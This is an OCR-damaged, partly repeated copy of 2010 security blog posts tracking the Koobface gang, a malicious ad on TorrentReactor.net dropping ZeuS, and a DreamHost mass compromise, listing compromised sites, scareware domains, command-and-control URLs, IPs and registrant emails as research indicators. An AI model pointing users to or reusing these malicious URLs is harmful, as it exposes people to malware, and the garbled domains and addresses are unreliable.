oxhalsobygg.se /amaizingmovies/ 

• Recommended reading: [6]Dissecting Koobface Gang 
Latest Face book Spreading Campaign 

partenaires-particuliers. fr /uo/ 

pegasolavoro.it /3I6/ 

peteknightdays.com /4ok4/ 

pheromoneforum.org /ds 7 

pilatescenter.se /bgx8e/ 

plymouth-tuc. org. uk /xhaq/ 

popeur. fr /m 7ya w/ 

pro-du-bio.com /af6xtp/ 

prousaudio.com /4isg/ 

puertohurraco.org /q3algz/ 

radioluz900am.com /3i993/ 

reporsenna.netsons.org /zvz/ 

rhigar.nu /6v/ 



richmondpowerboat.com /tifax5/ 

rmg360.co.cc /22i/ 

ronin wines, com /wonderfulvids/ 

rrmaps.com / J6o/ 

rvi.it/bv6k/ 

scarlett-oharas.com /my0333/ 
secure.tourinrome.org /qyp/ 
servicehandlaren.se /yq9ahw0/ 
servicehandlaren.spei-service. com /q9ql 15/ 
sgottnerivers.com /y0jl6rw/ 
shofarcall.com /zi/ 
sirius-expedition.com /x4yab/ 
slcsc. co. uk /Okem/ 
soderback.eu /xvg9/ 
spel-service.com /xm/ 
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sporthal.msolutions.be /vyx3yu/ 
steeistoneind.com /yzp/ 
stgeorgesteei.com /ji/ 
stgeorgesteei.com /ylnwlr/ 



stubbieholderking.com /dyarxl/ 
sweet-peasdog.se /Orcjo/ 
taekwondovelden.nl /mhnskk/ 
testjustin.comze.com /oafxzy/ 
the-beehive.com /r8x3cm/ 
the-beehive.com /weqw7e/ 
thedallestransmission.com /rjsg27 
therealmagnets. comuv. com /3wnl9n/ 
thestrategicfrog. 11 Omb.com /66vv/ 
tizianozanella.it/ k2cei/ 
trustonecorp.com /mabmpp/ 
unna.nu /6lie/ 

uroloki. omicronrecords. com /9t/ 
vaxjoff.com /4fpu/ 
veerle-frank.be /101/ 
verdiverdi.net /3tt/ 
vision ministerial, com /pi 91/ 
waffotis.se /yufi3u/ 
wa tsonspipingandhea ting, com /krda/ 
welplandeast.com /6q/ 



WES TCOAS TPERFORMANCECOATINGS. COM /I tw4/ 

williamarias.us /na9mq/ 

woodworksbyjamie.com /90m rjb/ 

wowparis2000.com /rtsz/ 

yin-art.be /a75ble/ 

youniverse.site50.net /4a9rZ 

Due to the diversity of its cybercrime operations, the 
Koobface gang is always worth keeping an eye on. Best 

of all - it's done semi-automatically these days. 

The best is yet to come, stay tuned! 

Related Koobface gang/botnet research: 

[7] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[8] Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 

[9] 10 things you didn't know about the Koobface gang 

[10] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[11] How the Koobface Gang Monetizes Mac OS X Traffic 

[12] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[13] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 



[14] Koobface Botnet Starts Serving Client-Side Exploits 

[15] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[16] Koobface Botnet's Scareware Business Model - Part Two 

[17] Koobface Botnet's Scareware Business Model - Part One 

[18] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[19] New Koobface campaign spoofs Adobe's Flash updater 
400 

[20] Socia\ engineering tactics of the Koobface botnet 
[21 ]Koobface Botnet Dissected in a Trend Micro Report 

[22] Movement on the Koobface Front - Part Two 

[23] Movement on the Koobface Front 

[24] Koobface - Come Out, Come Out, Wherever You Are 

[25] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [26]Dancho 
Danchev's blog. Follow him [27]on Twitter. 

1. http.Y/ddanchev. b lo g s oot, com/2010/04/dissectin a- 
koobface-aanas-latest. html 

2. http://www.zdnet.com/bloa/securitv/10-thin as- vou-didnt- 
know-about-the-koobface-aana/5452 

3. http.Y/ddanchev.blo as pot.com/2010/03/koobface- 
redirectors-and-scareware.html 















4. 


httoV/www. virustotal. com/anaHsis/6e07a43clb31464287d2e 

967226d7056366bdl fb 7b6950565c212c6d4 7e96a11-12 733 

38587 

5. 

httoV/www. virustotal.com/analisis/8a607a9335f08ac4fcf6ecc 

cc0fb4b2581 e92d03 71 ab09d22eb8 7cd8a3b68f85~l 2733 

38600 

6. http://ddanchev. blo as oot. com/2010/04/dissectin a- 
koobface-aanas-latest.html 

7. http://ddanchev.blo as pot.com/2010/04/dissectin a- 
koobface-aanas-latest.html 

8. http://ddanchev.blo as pot.com/2010/03/koobface- 
redirectors-and-scareware.html 

9. htto://www.zdnet.com/bloa/securitv/10-thin as- vou-didnt- 
know-about-the-koobface-aana/5452 

10. httoV/ddanchev.blo as oot. com/2010/02/diverse-Dortfolio- 
of-scarewareblackhat.html 

11. htto://ddanchev.blo as oot.com/2010/02/how-koobface- 
aana-monetizes-mac-os-x.htm / 

12. httoV/ddanchev.blo as oot. com/2009/12/koobface-aan a- 
wishes-industrv-ha oo v.html 

13. httoV/ddanchev.blo as oot. com/2009/12/koobface-friendl v- 
riccom-ltd-as29550. html 








































14. htto.V/ddanchev.blo as oot.com/2009/11/koobface-botnet- 
starts-servina-client.htm! 

15. http://ddanchev.blo as oot. com/2009/11/massive- 
scareware-servina-blackhat-seo.html 

16. htto.V/ddanchev.blo as oot. com/2009/1 1/koobface-botnets- 
scareware-business. him I 

17. http://ddanchev.blo as pot.com/2009/Q9/koobface-botnets- 
scareware-business. html 

18. htto.V/ddanchev.blo as oot.com/2009/10/koobface-botnet- 
redirects-facebooks-io.html 

19. htto://bloas.zdnet.com/securit v/? o=4594 

20. http://content.zdnet.com/2346-12691 22-352597.html 

21. htto.V/ddanchev.blo as oot. com/2009/10/koobface-botnet- 
dissected-in-trendmicro.html 

22. htto.V/ddanchev.blo as oot. com/2009/08/movement-on- 
koobface-front-oart-two.html 

23. htto.V/ddanchev.blo as oot. com/2009/08/movement-on- 
koobface-front. html 

24. htto.V/ddanchev.blo as oot.com/2009/07/koobface-come- 
out-come-out-wherever-vou.html 

25. htto.V/ddanchev.blo as oot. com/2009/07/dissectin a- 
koobface-worms-twitter. html 

26. http.V/ddanchev.blo as pot.com/ 

27. http://twitter.com/danchodanchev 
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From the Koobface Gang with Scareware Serving 
Compromised Sites (2010-05-08 20:46) 

Following last month's "[IjDissecting Koobface Gang's 
Latest Facebook Spreading Campaign'' Koobface gang 
coverage, it's time to summarize some of their botnet 
spreading activities, from the last couple of days. 

Immediately after the suspension of their automatically 
registered Blogspot accounts, the gang once again 

proved that it has contingency plans in place, and started 
pushing links to compromises sites, in a combination with an 
interesting "visual social engineering trick", across Facebook, 
which sadly works pretty well, in the sense that it completely 
undermines the " don't dick on links pointing to unknown 
sites" type of security tips. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

The diverse set of activities courtesy of the Koobface gang - 
consider going through the related posts in order to 
understand their underground multitasking mentality beyond 
the Koobface botnet itself - are a case study on the 

abuse of legitimate infrastructure with dean IP/AS 
reputation, for purely malicious purposes. 

This active use of the " trusted reputation chain", just like the 
majority of social engineering centered tactics of the gang, 
aim to exploit the ubiquitous weak link in the face of the 


average Internet user. Here's an example of the most recent 
campaign. 

The spreading of fully working links such as the following 
ones across Facebook: 

face book. com/l/6e 7e5;bit. ly/9QjjSk 

facebook. com/l/cdfb;bit. ly/9QjjSk 

facebook. com/l/f3c29;bit. ly/9QjjSk 
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aims to trick the infected user's friends, that this is a 
Facebook.com related link. Clicking on this link inside 
Facebook leads to the "Be careful" window showing just the 
bit.ly redirector, to finally redirect to 198.65.28.86/swamt/ 
where a Koobface bogus video has already been seen by 
2,601 users which have already clicked on the link. 

The sea re ware redirectors/actual serving domains are parked 
at 195.5.161.126, [3JAS31252, STARNET-A5 Star- 

Net Moldova: 

lnasa-test.com - Email: test@now.net.cn 
lonline-test.com - Email: test@now.net.cn 
lwww2scanner.com - Email: test@now.net.cn 
2a-scanner.com - Email: test@now.net.cn 
2nasa-test.com - Email: test@now.net.cn 
2online-test.com - Email: test@now.net.cn 


2www2scanner.com - Email: test@now.net.cn 
3a-scanner.com - Email: test@now.net.cn 
3nasa-test.com - Email: test@now.net.cn 
3online-test.com - Email: test@now.net.cn 
3www2scanner.com - Email: test@now.net.cn 
4a-scanner.com - Email: test@now.net.cn 
4check-computer.com - Email: test@now.net.cn 
4nasa-test.com - Email: test@now.net.cn 
4online-test.com - Email: test@now.net.cn 
4www2scanner.com - Email: test@now.net.cn 
5a-scanner.com - Email: test@now.net.cn 
5nasa-test.com - Email: test@now.net.cn 
5oniine-test.com - Email: test@now.net.cn 
6a-scanner.com - Email: test@now.net.cn 
defence-status6.com - Email: test@now.net.cn 
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defence-status7.com - Email: test@now.net.cn 
mega-scan2.com - Email: test@now.net.cn 

protection-status2.com - Email: test@now.net.cn 


protection-status4.com - Email: test@now.net.cn 
protection-status6.com - Email: test@now.net.cn 
security-statusl.com - Email: test@now.net.cn 
security-status3.com - Email: test@now.net.cn 
security-status4.com - Email: test@now.net.cn 
security-status6.com - Email: test@now.net.cn 
securitystatus7.com - Email: test@now.net.cn 
securitystatus8.com - Email: test@now.net.cn 
securitystatus9.com - Email: test@now.net.cn 
security-status9.com - Email: test@now.net.cn 
Detection rates: 

- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 
7/41(17.08%) 

- RunAV_312s2.exe - [5]VirTool. Win32.Obfuscator.hgib (v); 
High Risk Cloaked Malware - Result: 4/41 (9.76 %) The 

sea re ware sample phones back to: 

- windows32-sys.com/download/winlogo.bmp - 

91.213.157.104 f AS13618 CARONET-ASN - Email: 
contact@pri vacy- 

protect.cn 

- sysdllupdates.com/?b=312s2 - 87.98.134.197, AS16276, 
OVH Paris - Email: contact@privacy-protect.cn 



The complete list of compromised sites distributed by 
Koobface-infected Facebook users: 

02f32e3.netsolhost.com /o492dc/ 

abskupina.si /cclq/ 

adi-agencement. fr /8r2twm/ 

agilitypo wer. dk /ko2/ 

aguasdomondego.com /d5yodi/ 

alabasta.homeip.net /e8/ 

alankaye.info /2egg/ 
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alpenhaus.com.ar / a/5zvf5/ 
animationstjo. fr /5 c/ 
artwork, dray ton. co. uk /k5 wz/ 
beachfishingwa.org.au /u8g98ai/ 
biidtuben.se /I9jg/ 
chalet.se /srb/ 
charlepoeng.be /iOtwbt/ 
christchurchgastonia.org /lhkq/ 
chunkbait.com /gb4i6ak/ 


cityangered.se /besttube/ 
ciarkecasa.net /rhk6/ 
clr.dsfm.mb.ca /2964/ 

codeditor. a wardspace. biz /uncensoredclip/ 
coloridellavita.com /sc/ 
cp vs. org /6eobhOn/ 
danieletranchita.com /yourvids/ 
dennis-leah.zzl.org /m95/ 
doctorsorchestra.com /qw/ 
dueciliguria.it /zircu/ 
ediltermo.com /p4zhvj0/ 
emmedici.net /2pg46mk/ 

euroba us toff, marketing-genera tor. de /52649an/ 

euskorock.es /p4zm/ 

explicit ft a vour. freeiz. com /qk3r/ 

f9phx. net /s vr/ 

fatucci.it /104 s 8 m 2/ 

forwardmarchministries. org /Ibc/ 

fotoplanet.it /bnog6s/ 

frenchbean.co. uk /zwr/ 



furius. comoj. com /I azl/ 
ge ve. be /oj4ex4/ 

gite-maison-pyrenees-luchon. com /jox/ 



googleffffffffa0ac4d9f. omicronrecords. com /me/ 
gosin.be /ist63z/ 
grimsiovsms.se /cutetube/ 
guest, woridviewproduction.com /m2f/ 
hanssen-racing.com /jl5/ 
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helpbt.com /nqo40uq/ 
helpdroid. omicronrecords. com /7h/ 
hoganjobs.com /jrepsp/ 
holustravel.cz /5j5/ 
hoperidge.com /fltwizy/ 
hottesttomato.com /6b/ 
iglesiabetanial.com /7y7/ 
ihostu. co. uk /jic9v/ 
ilterrazzoalla veneziana. it /4 vxaq5/ 
integratek. omicronrecords.com /to4u2bd/ 
irisjard.o2switch.net /lb/ 
isiandmusicexport.com /hbi2ut9/ 
isteinaudi.it /h2a/ 


johnphelan.com /uynv4/ 
jsacm.com /z6/ 
kabchicago. in fo /I cgko/ 
katia-paliotti.com /Obaktz/ 
kennethom.net /120/ 
kleppcc.com /aliendemonstration/ 
klimentglass.cz /vwaip/ 
kvarteretekorren.se /60/ 
ianavabadajoz.com /eg/ 
langstoncorp.com /o2072c/ 
libermann.phpnet.org /madu8p/ 
lineapapel.com /8l20up/ 
longting.nl /6c h/ 
mainteck-fr.com /qjbo5v/ 
majesticdance.com /vlg/ 
mia-niisson.se /cmc/ 
microstart, fr /Izul/ 
migdal. org. ii /y952eo/ 
mindbodyandsolemt.com /pnbn/ 
musicomm.ca /a5z/ 



nassnig.org /zl/ 
neweed.org /x4t/ 
nosneezes.com /Shjkdjo/ 
nottinghamdowns.com /m7ec/ 
nutman-group.com /92m/ 
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omicronsystems.inc.md /ehoO/ 

on3la.be /bgfhclg/ 

onlineadmin.net /b7uccx/ 

ornskoidska tten. se /m 1 u/ 

oxhalsobygg. se /amaizingmo vies/ 

• Recommended reading: [6]Dissecting Koobface Gang 
Latest Face book Spreading Campaign 

partenaires-particuliers. fr /uo/ 

pegasolavoro.it /3I6/ 

peteknightdays.com /4ok4/ 

pheromoneforum.org /ds/ 

pilatescenter.se /bgx8e/ 

plymouth-tuc.org. uk /xhaq/ 


popeur. fr /m 7ya w/ 
pro-du-bio.com /af6xtp/ 
prousaudio.com /4isg/ 
puertohurraco.org /q3algz/ 
radioluz900am.com /3i993/ 
reporsenna.netsons.org /zvz/ 
rhigar.nu /6v/ 

richmondpowerboat.com /tifax5/ 
rmg360.co.cc /22i/ 
roninwines.com /wonderfulvids/ 
rrmaps.com /j6o/ 
rvi.it/bv6k/ 

scarlett-oharas.com /my0333/ 
secure.tourinrome.org /qyp/ 
servicehandlaren.se /yq9ahw0/ 
servicehandiaren.spei-service.com /q9ql 15/ 
sgottnerivers.com /y0jl6rw/ 
shofarcall.com /zi/ 
sirius-expedition.com /x4yab/ 
slcsc. co. uk /Okem/ 



soderback.eu /xvg9/ 
spel-service.com /xm/ 

407 

sporthal.msolutions.be /vyx3yu/ 
steeistoneind.com /yzp/ 
stgeorgesteei.com /ji/ 
stgeorgesteei.com /yinwir/ 
stubbieholderking.com /dyarxl/ 
sweet-peasdog.se /Orejo/ 
taekwondovelden.nl /mhnskk/ 
testjustin.comze.com /oafxzy/ 
the-beehive.com /r8x3cm/ 
the-beehive.com /weqw7e/ 
thedallestransmission.com /rjsg2/ 
therealmagnets.comuv.com /3wnl9n/ 
thestrategicfrog. 11 Omb. com /66vv/ 
tizianozaneiia.it/ k2cei/ 
trustonecorp.com /mabmpp/ 
unna.nu /6iie/ 

uroloki. omicronrecords. com /9t/ 



vaxjoff.com /4fpu/ 
veerle-frank.be /I01/ 
verdiverdi.net /3tt/ 
visionministerial. com /pi 91/ 
waffotis.se /yufi3u/ 
watsonspipingandheating.com /krda/ 
welplandeast.com /6q/ 

WES TCOA S TPERFORM A NCECOA TINGS. COM /I tw4/ 

williamarias.us /na9mq/ 

woodworksbyjamie.com /90mrjb/ 

wowparis2000.com /rtsz/ 

yin-art. be /a75ble/ 

youniverse.site50.net /4a9r/ 

Due to the diversity of its cybercrime operations, the 
Koobface gang is always worth keeping an eye on. Best 

of all - it's done semi-automaticaily these days. 

The best is yet to come, stay tuned! 

Related Koobface gang/botnet research: 

[7]Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 



[8] Koobface Redirectors and Sea re ware Campaigns Now 
Hosted in Moldova 

[9] 10 things you didn't know about the Koobface gang 

[10] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[llJHow the Koobface Gang Monetizes Mac OS X Traffic 

[12] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[13] Koobface-Friendly Riccom LTD - AS29550 - (Finally) 
Taken Offline 

[14] Koobface Botnet Starts Serving Client-Side Exploits 

[15] Massive Sea reware Serving Blackhat SEO, the Koobface 
Gang Style 

[16] Koobface Botnet's Scareware Business Model - Part Two 

[17] Koobface Botnet's Scareware Business Model - Part One 

[18] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[19] New Koobface campaign spoofs Adobe's Flash updater 
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[20] Social engineering tactics of the Koobface botnet 

[21] Koobface Botnet Dissected in a Trend Micro Report 

[22] Movement on the Koobface Front - Part Two 



[23] Movement on the Koobface Front 

[24] Koobface - Come Out, Come Out, Wherever You Are 

[25] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [26]Dancho 
Danchev's blog. Follow him [27]on Twitter. 
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13. htto.V/ddanche i/. blo as oot. com/2009/12/koobface- 
friendlv-nccom-ltd-as29550.html 
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botnets-scareware-business.html 

17. htto.V/ddanchev. blo as oot. com/2009/09/koobface- 
botnets-scare ware-business, html 

18. htto.V/ddanchev. blo as oot. com/2009/10/koobface-botnet- 
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19. htto://bloas.zdnet.com/securit v/? D=4594 
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21. htto.V/ddanchev. blo as oot. com/2009/1O/koobface-botnet- 
dissected-in-trendmicro. html 

22. htto.V/ddanchev.blo as oot. com/2009/08/movement-on- 
koobface-front-oart-two. html 

23. htto.V/ddanche i/. blo as oot.com/2009/08/movement-on- 
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TorrentReactor.net Serving Crimeware, Client-Side 
Exploits Through a Malicious Ad (2010-05-11 08:34) 

Deja vu! 

[ljjerome Segura at the Malware Diaries is reporting that 
TorrentReactor.net, a high-trafficked torrents tracker, is 
currently serving live-exploits through a malicious ad served 
by " Fulldls.com - Your source for daily torrent downloads". 

Why deja vu? It's because the [2]TorrentReactor.net 
malware campaign takes me back to 2008, among the 

very first extensive profiling of Russian Business Network 
activity, with their mass "input validation abuse" campaign 






















back then, successfully appearing on numerous high- 
trafficked web sites, serving guess what? Sea reware. 

Moreover, despite the surprisingly large number of people 
still getting impressed by the use of http referrers 

as an evasive practice applied by the cybercriminals, these 
particular campaigns ([3]ZDNet Asia and Torrent Re actor 
IFRAME-ed; [4]Wired.com and History.com Getting RBN-ed; 
[5]Massive IFRAME 5E0 Poisoning Attack Continuing) 

are a great example of this practice in use back then: 

• So the malicious parties are implementing simple referrer 
techniques to verify that the end users coming to 

their IP, are the ones they expect to come from the 
campaign, and not client-side honey pots or even security 

researchers. And if you're not coming from you're supposed 
to come, you get a 404 error message, deceptive 

to the very end of it. 

The most recent compromise of TorrentReactor.net 
appears to be taking place through a maiicioud ad serving 
exploits using the NeoSpioit kit, which ultimately drops a 
ZeuS crime ware sample hosted within a fast-flux botnet. 
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The campaign structure, including detection rates, phone 
back locations and ZeuS crimeware fast-flux related data is 
as follows: 


- ads. fulldls.com /phpadsnew/www/delivery/afr.php? 
zone id ~ I &cb=291476 

- ad.leet.la /stats?ref= .*ads\.fulldls\.com $ - 

208.111.34.38 - Email: bertrand.crevin@brutele.com 

(leet.la - 

212.68.193.197 - A512392, ASBRUTELE AS Object for 
Brutele SC) 

- lo.dep.lt/info/usl.html - 91.212.12/.110 - lo.dep.lt - 

91.212.12/.110 - AS49087, Telos-Solutions-AS Telos 
Solutions LTD 

- 91.216.3.108 /del/index.php; 91.216.3.108 
/cal/main.php - AS50896, PROXIEZ-AS PE Nikolaev Alexey 
Valerievich 

- 91.216.3.108 responding to gaihooxaefap.com - 

Nikolay Vukolov, Email: woven@qx8.ru 

Upon successful exploitation, the following malicious pdf is 
served: 

- eac27d.pdf - [6 ] Exploit. PDF-JS. Gen (v); JS:Pdfka-AET; - 
Result: 6/40 (15 %) which when executed phones back to 

91.216.3.108 

/cal/banner. php/1 fdal 61 dabl edd2f385d43c705a541 
d3?spl=pdf _30apr and drops: 

- myexebr.exe - [ 7 ]TSPY_QAKBOT.SMG - Result: 1//41 

(41.4 7 %) which then phones back to the ZeuS crimeware C 

&C: [8jsaiwoofeutie.com /bin/ahwohn.bin - 78.9.77.158 

- Email: spasm@maillife.ru 
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Fast-fluxed domains sharing the same infrastructure: 

demiliawes.com - Email: bust@qx8.ru 

jademason.com - 213.156.118.221; 217.201.4.95; 
24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124; 170.51.231.93 - Email: 
biare@bigmaiibox. ru 

laxahngeezoh.com -190.135.224.89; 213.156.118.221; 
217.201.4.95; 24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124 - Email: 
zig@fastermail. ru 

line-ace.com - Email: greysy@gmx.com 

xareemudeixa.com -112.201.223.129; 119.228.44.124; 
170.51.231.93; 190.135.224.89; 213.156.118.221; 

217.201.4.95; 24.139.152.4; 85.176.73.211 - Email: 
writhe@fastermail. ru 

zeferesds.com -190.135.224.89; 213.156.118.221; 
217.201.4.95; 24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124 - Email: 
mated@freemailbox. ru 

Name servers of notice: 

nsl.rexonna.net - 202.60.74.39 - Email: 
aquvafrog@animail.net 

ns2.rexonna.net - 25.120.19.23 

nsl.iine-ace.com - 202.60.74.39 - Email: 
greysy@gmx. com 


ns2.line-ace.com - 67.15.223.219 



nsl.growthproperties.net - 62.19.3.2 - Email: 
growth@support.net 

ns2.growthproperties.net -15.94.34.196 

nsl.tropic-nolk.com - 62.19.3.2 - Email: 
greysy@gmx. com 

ns2.tropic-noik.com -171.103.51.158 

These particular iFrame injection Russian Business 
Network's campaigns from 2008, used to rely on the 
following URL 

for their malicious purposes - a-n-d- 
the.com/wtr/router.php (216.255.185.82 - INTERCAGE- 
NETW0RK-GR0UP2). 

Why am / highlighting it? Excerpts from previous profiled 
campaigns, including one that is directly linked to the 
Koobface gang's blackhat SEO operations. 

[9JU.S Federal Forms Blackhat SEO Themed Scareware 
Campaign Expanding : 

• The compromised/mis-configured web sites participating 
in this latest blackhat SEO campaign are surprisingly 

redirecting to a-n-d-the.com /wtr/router.php - 

95.168.1//.35 - Email: bulk@spam.lv - AS28/53 NETDIRECT 
AS 

NETDIRECT Frankfurt, DE if the http referrer condition isn't 
met. This very same domain - back then parked 

at INTERCAGE-NETW0RK-GR0UP2 - was also used in the 
same fashion in March, 2008's massive blackhat SEO 



campaigns serving sea re ware. 

Not only is a-n-d-the.com /wtr/router.php 

(95.168.177.35) (Web [lOJsessions of the URL acting as 
[ll]a redirector), the exact same URL that was in 
circulating in 2008, residing on the Russian Business 
Network's netblock back then, still active, but also, it's 
currently redirecting to - if the campaign's evasive 
conditions are met - to www4.zaikob8.xorg.pl/?uid=213 
&pid=3 &ttl=31345701120 - 217.149.251.12. 

What this proves is fairly simple - with or without the 
Russian Business Network the way we used to know it, 

it's customers simply moved on to the competition, whereas 
the original Russian Business Network simply diversified its 
netblocks ownership. 

Related posts: 

[12JZD Net Asia and Torrent Re actor IFRAME-ed 

[13] Wired.com and History.com Getting RBN-ed 

[14] Massive IFRAME 5E0 Poisoning Attack Continuing 
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12. http.V/ddanche v. b lo gs pot, com/2008/03/zdnet-asia-and- 
torrentreactor-iframe-ed.html 

13. http.V/ddanche v. b lo g s pot, com/2008/03/wiredcom-and- 
historvcom-aettina-rbn-ed.html 

14. http.V/ddanche v. b lo g s pot, com/2008/03/massive-iframe- 
seo-Poisonina-attack.html 

15. http.V/ddanchev. blo as oot. com/ 

16. http://twitter, com/danchodanchev 
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TorrentReactor.net Serving Crimeware, Client-Side 
Exploits Through a Malicious Ad (2010-05-11 08:34) 

Deja vu! 

[ljjerome Segura at the Malware Diaries is reporting that 
TorrentReactor.net, a high-trafficked torrents tracker, is 
currently serving live-exploits through a malicious ad served 
by " Fulldls.com - Your source for daily torrent downloads". 

Why deja vu? It's because the [2]TorrentReactor.net 
malware campaign takes me back to 2008, among the 

very first extensive profiling of Russian Business Network 
activity, with their mass "input validation abuse" campaign 
back then, successfully appearing on numerous high- 
trafficked web sites, serving guess what? Sea re ware. 



















Moreover, despite the surprisingly large number of people 
still getting impressed by the use of http referrers 

as an evasive practice applied by the cybercriminals, these 
particular campaigns ([3]ZDNet Asia and Torrent Re actor 
IFRAME-ed; [4]Wired.com and History.com Getting RBN-ed; 
[5]Massive IFRAME SEO Poisoning Attack Continuing) 

are a great example of this practice in use back then: 

• So the malicious parties are implementing simple referrer 
techniques to verify that the end users coming to 

their IP, are the ones they expect to come from the 
campaign, and not client-side honey pots or even security 

researchers. And if you're not coming from you're supposed 
to come, you get a 404 error message, deceptive 

to the very end of it. 

The most recent compromise of TorrentReactor.net 
appears to be taking place through a malicioud ad serving 
exploits using the NeoSploit kit, which ultimately drops a 
ZeuS crime ware sample hosted within a fast-flux botnet. 
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The campaign structure, including detection rates, phone 
back locations and ZeuS crimeware fast-flux related data is 
as follows: 

- ads. fulldls.com /phpadsnew/www/delivery/afr.php? 
zoneid=l &cb=291476 


- ad.leet.la /stats?ref= .*ads\.fulldls\.com $ - 

208.111.34.38 - Email: bertrand.crevin@brutete.com 

(leet.la - 

212.68.193.197 - A512392, ASBRUTELE AS Object for 
Bruteie SC) 

- lo.dep.lt/info/usl.html - 91.212.12/.110 - lo.dep.lt - 

91.212.12/.110 - AS49087, Telos-Solutions-AS Telos 
Solutions LTD 

- 91.216.3.108 /del/index.php; 91.216.3.108 
/cal/main.php - AS50896, PROXIEZ-AS PE Nikolaev Alexey 
Valerievich 

- 91.216.3.108 responding to gaihooxaefap.com - 

Nikolay Vukolov, Email: woven@qx8.ru 

Upon successful exploitation, the following malicious pdf is 
served: 

- eac27d.pdf - [6]Exploit. PDF-JS. Gen (v); JS:Pdfka-AET; - 
Result: 6/40 (15 %) which when executed phones back to 

91.216.3.108 

/cal/banner. php/1 fdal 61 dabl edd2f385d43c705a541 
d3?spl=pdf _30apr and drops: 

- myexebr.exe - [ 7 ]TSPY_QAKBOT.SMG - Result: 1//41 
(41.47 %) which then phones back to the ZeuS crimeware C 

&C: [8 jsaiwoofeutie.com /bin/ahwohn.bin - 78.9.77.158 

- Email: spasm@maillife.ru 
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Fast-fluxed domains sharing the same infrastructure: 



demiliawes.com - Email: bust@qx8.ru 


jademason.com - 213.156.118.221; 217.201.4.95; 
24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124; 170.51.231.93 - Email: 
blare@bigmailbox. ru 

laxahngeezoh.com -190.135.224.89; 213.156.118.221; 
217.201.4.95; 24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124 - Email: 
zig@fastermaii. ru 

line-ace.com - Email: greysy@gmx.com 

xareemudeixa.com -112.201.223.129; 119.228.44.124; 
170.51.231.93; 190.135.224.89; 213.156.118.221; 

217.201.4.95; 24.139.152.4; 85.176.73.211 - Email: 
writhe@fastermaii. ru 

zeferesds.com - 190.135.224.89; 213.156.118.221; 
217.201.4.95; 24.139.152.4; 83.10.238.182; 85.176.73.211; 
112.201.223.129; 119.228.44.124 - Email: 
mated@freemailbox. ru 

Name servers of notice: 

nsl.rexonna.net - 202.60.74.39 - Email: 
aquvafrog@animail.net 

ns2.rexonna.net - 25.120.19.23 

nsl.line-ace.com - 202.60.74.39 - Email: 
greysy@gmx. com 

ns2.line-ace.com - 67.15.223.219 



nsl.growthproperties.net - 62.19.3.2 - Email: 
growth@support.net 

ns2.growthproperties.net -15.94.34.196 

nsl.tropic-nolk.com - 62.19.3.2 - Email: 
greysy@gmx. com 

ns2.tropic-noik.com -171.103.51.158 

These particular iFrame injection Russian Business 
Network's campaigns from 2008, used to rely on the 
following URL 

for their malicious purposes - a-n-d- 
the.com/wtr/router.php (216.255.185.82 - INTERCAGE- 
NETW0RK-GR0UP2). 

Why am / highlighting it? Excerpts from previous profiled 
campaigns, including one that is directly linked to the 
Koobface gang's blackhat SEO operations. 

[9JU.S Federal Forms Blackhat SEO Themed Scareware 
Campaign Expanding : 

• The compromised/mis-configured web sites participating 
in this latest blackhat SEO campaign are surprisingly 

redirecting to a-n-d-the.com /wtr/router.php - 

95.168.1//.35 - Email: bulk@spam.lv - AS28/53 NETDIRECT 
AS 

NETDIRECT Frankfurt, DE if the http referrer condition isn't 
met. This very same domain - back then parked 

at INTERCAGE-NETW0RK-GR0UP2 - was also used in the 
same fashion in March, 2008's massive blackhat SEO 



campaigns serving sea re ware. 

Not only is a-n-d-the.com /wtr/router.php 

(95.168.177.35) (Web [lOJsessions of the URL acting as 
[ll]a redirector), the exact same URL that was in 
circulating in 2008, residing on the Russian Business 
Network's netblock back then, still active, but also, it's 
currently redirecting to - if the campaign's evasive 
conditions are met - to www4.zaikob8.xorg.pl/?uid=213 
&pid=3 &ttl=31345701120 - 217.149.251.12. 

What this proves is fairly simple - with or without the 
Russian Business Network the way we used to know it, 

it's customers simply moved on to the competition, whereas 
the original Russian Business Network simply diversified its 
netblocks ownership. 

Related posts: 

[12JZD Net Asia and Torrent Re actor IFRAME-ed 

[13] Wired.com and History.com Getting RBN-ed 

[14] Massive IFRAME 5E0 Poisoning Attack Continuing 
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Dissecting the Mass DreamHost Sites Compromise 
(2010-05-11 22:19) 

Yet another [ljmass sites compromise is currently 
taking place , this time targeting DreamHost 
customers, courtesy of the same gang behind the U.5 
Treasury/GoDaddy/NetworkSolutions mass compromise 
campaigns. 

What's particularly interesting about the campaign, is not 
just [2]the Hilary Kneber connection, but also, the fact 
that a key command and control domain part of the 
Koobface botnet, is residing within the same AS where the 

nameservers, and one of actual domains 
(kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, 
BKCNET "SiA" IZZI) used in previous campaigns are. 



















These gangs are either aware of one another's existence, 
are the exact same gang doing basic evasive prac¬ 
tices on multiple fronts, or are basically customers of the 
same cybercrime-friendly hosting service provider. 
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The DreamHost campaign structure, including the detection 
rates, phone back locations, is as follows: 

- zettapetta.com/js.php -109.196.143.56 - Email: 
hiiarykneber@yahoo. com 

- www4.suitcase52td.net/?p= - 78.46.218.249 - Email: 
gkook@checkjemail. nl 

- wwwl.realsafe-23.net - 209.212.149.17 - Email: 
gkook@checkjemail. nl 
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Active client-side exploits serving, redirector domains 
